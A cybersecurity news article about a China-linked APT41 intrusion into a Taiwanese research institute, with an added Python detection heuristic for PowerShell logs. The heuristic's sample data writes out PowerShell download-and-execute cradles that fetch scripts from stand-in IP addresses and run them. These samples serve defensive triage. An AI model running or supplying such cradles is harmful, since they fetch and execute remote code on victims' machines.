A Taiwanese government-affiliated research institute specializing in computing and related technologies has been compromised by a nation-state threat actor with ties to China, according to new findings from Cisco Talos.
The organization, whose name has not been released, was targeted as early as mid-July 2023 to deliver a variety of backdoors and post-exploitation tools, including ShadowPad and Cobalt Strike, which are estimated with medium confidence to be the work of an active hacking group tracked as APT41.
“The ShadowPad malware used in the current campaign exploits an old, vulnerable version of the Microsoft Office IME binary as a loader, which then loads a customized second-stage loader to launch the payload,” said security researchers Joey Chen, Ashley Shen and Vitor Ventura.
“The threat actors were able to compromise three hosts within the target environment and successfully exfiltrate several documents from the network.”
Cisco Talos said it discovered the activity in August 2023 after detecting “anomalous PowerShell commands” that connected to IP addresses to download and execute PowerShell scripts within compromised environments.
The exact initial access vector used in the attack is unknown, but the intrusion relied on web shells to maintain persistent access and drop additional payloads such as ShadowPad and Cobalt Strike, the latter delivered by a Go-based Cobalt Strike loader called CS-Avoid-Killing.
“The Cobalt Strike malware was developed with an anti-AV loader to evade AV detection and avoid isolation from security products,” the researchers said.
In other instances, the threat actors were observed executing PowerShell commands that launch scripts to run ShadowPad in memory and retrieve Cobalt Strike malware from compromised command-and-control (C2) servers. The DLL-based ShadowPad loader (also known as ScatterBee) is executed via DLL side-loading.
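As an added illustration of the detection pivot described above (PowerShell commands that fetch scripts from bare IP addresses and run them), the following Python heuristic triages PowerShell script-block log entries; it is not Talos tooling or the report's detection logic, and the sample commands and IP addresses are constructed for this example.

```python
"""Heuristic triage of PowerShell script-block log entries for download-and-execute
cradles that reach out to IP-literal URLs. Added example with constructed data only."""
import re
from ipaddress import ip_address, ip_network

# A URL whose host is an IPv4 literal rather than a DNS name.
IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:/\S*)?", re.IGNORECASE)
# Documented PowerShell/.NET constructs that fetch remote content ...
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b"
                      r"|Invoke-RestMethod|\birm\b|Net\.WebClient|HttpClient", re.IGNORECASE)
# ... and constructs that execute what was fetched (IEX, Start-Process, -enc, -file).
EXECUTE = re.compile(r"Invoke-Expression|\biex\b|Start-Process|-EncodedCommand"
                     r"|\s-e(?:nc)?\s|\s-f(?:ile)?\s", re.IGNORECASE)
RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def _valid_ipv4(text: str) -> bool:
    try:
        ip_address(text)
        return True
    except ValueError:  # e.g. "999.1.1.1" matched the octet pattern but is not an address
        return False

def triage(script_block: str) -> dict:
    """Return the indicators found in one script block plus a combined verdict.

    Suspicious = IP-literal URL together with a download or execution construct.
    Internal (RFC 1918) hosts are reported separately so the rule can be tuned."""
    hosts = [m.group(1) for m in IP_URL.finditer(script_block) if _valid_ipv4(m.group(1))]
    ind = {
        "ip_literal_url": bool(hosts),
        "internal_ip": any(ip_address(h) in net for h in hosts for net in RFC1918),
        "download": bool(DOWNLOAD.search(script_block)),
        "execute": bool(EXECUTE.search(script_block)),
    }
    ind["suspicious"] = ind["ip_literal_url"] and (ind["download"] or ind["execute"])
    return ind

def flagged(blocks: list) -> list:
    """Indices of the script blocks that triage() marks suspicious."""
    return [i for i, b in enumerate(blocks) if triage(b)["suspicious"]]

# Constructed sample script blocks (TEST-NET / RFC 1918 addresses, made-up paths).
SAMPLE_SCRIPT_BLOCKS = [
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:8080/update.ps1')",
    "Invoke-WebRequest -Uri http://198.51.100.7/s.ps1 -OutFile C:\\Users\\Public\\s.ps1; "
    "Start-Process powershell -ArgumentList '-ep bypass -f C:\\Users\\Public\\s.ps1'",
    "Invoke-WebRequest -Uri https://intranet.example.local/tools/agent.msi -OutFile C:\\temp\\agent.msi",
    "Test-NetConnection 10.0.0.5 -Port 445",
    "iwr http://192.168.10.20/agent.ps1 -OutFile C:\\temp\\a.ps1",  # internal host, review in context
]

if __name__ == "__main__":
    for i in flagged(SAMPLE_SCRIPT_BLOCKS):
        print(i, triage(SAMPLE_SCRIPT_BLOCKS[i]))
```

Feed it the ScriptBlockText field of PowerShell script-block logging events (Event ID 4104) and treat hits as triage leads, not verdicts: the last sample shows a fetch from an internal address, which is common in legitimate administration but also fits staging through an already compromised host.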
Other steps taken as part of the intrusion included using Mimikatz to extract passwords and running several commands to gather information about user accounts, directory structures, and network configurations.
“APT41 created a customized loader that injects a proof-of-concept for CVE-2018-0824 directly into memory to exploit a remote code execution vulnerability and achieve local privilege escalation,” Talos said, noting that the final payload, UnmarshalPwn, is unleashed after going through three distinct stages.
The cybersecurity organization also noted that the attackers are attempting to evade detection by ceasing their own activity if they detect other users on the system. “Once the backdoor is deployed, malicious actors will remove the web shell and guest accounts that granted them the initial access,” the researchers said.
The revelation comes after Germany revealed earlier this week that Chinese state actors had carried out a cyberattack in 2021 against the country’s national mapping agency, the Federal Office of Mapping and Geodesy (BKG), for espionage purposes.
The Chinese embassy in Berlin said the allegations were baseless and called on Germany to “stop using cybersecurity issues to smear China politically and media.”